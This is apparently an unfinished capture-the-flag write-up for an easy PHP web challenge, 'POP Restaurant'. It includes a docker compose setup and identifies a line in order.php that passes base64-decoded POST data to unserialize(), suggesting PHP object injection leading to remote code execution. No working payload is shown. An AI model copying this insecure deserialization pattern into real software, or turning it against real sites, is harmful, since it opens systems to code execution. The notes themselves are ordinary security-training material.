55 lines
No EOL
1.2 KiB
Markdown
55 lines
No EOL
1.2 KiB
Markdown
# POP Restaurant - web - easy
|
|
|
|
## Description
|
|
|
|
Spent a week to create this food ordering system. Hope that it will not have any critical vulnerability in my application.
|
|
|
|
----
|
|
|
|
## General
|
|
- Flag is under `/`, e.g: `/sXrq5wWZZYpMh_flag.txt`
|
|
- Therefore name is not predictable - probably RCE needed?
|
|
-
|
|
|
|
explanation of the attack vector
|
|
https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection
|
|
|
|
|
|
## Compose
|
|
|
|
Place one directory level above the provided challenge folder.
|
|
|
|
Launch with `docker compose up --watch`.
|
|
|
|
```yaml
|
|
services:
|
|
web-pop_restaurant:
|
|
build:
|
|
context: ./challenge # if one level above provided challenge files.
|
|
dockerfile: Dockerfile
|
|
container_name: web-pop_restaurant
|
|
ports:
|
|
- "1337:80"
|
|
stdin_open: true
|
|
tty: true
|
|
develop:
|
|
watch:
|
|
- action: sync
|
|
path: ./challenge/challenge
|
|
target: /var/www/html
|
|
ignore:
|
|
- .git/
|
|
- action: sync
|
|
path: ./challenge/flag.txt
|
|
target: /flag.txt
|
|
```
|
|
|
|
## `order.php`
|
|
|
|
```php=16
|
|
$order = unserialize(base64_decode($_POST['data']));
|
|
```
|
|
|
|
User controlled input, unsaitized, send to unserialize().
|
|
|
|
Thats bad :( |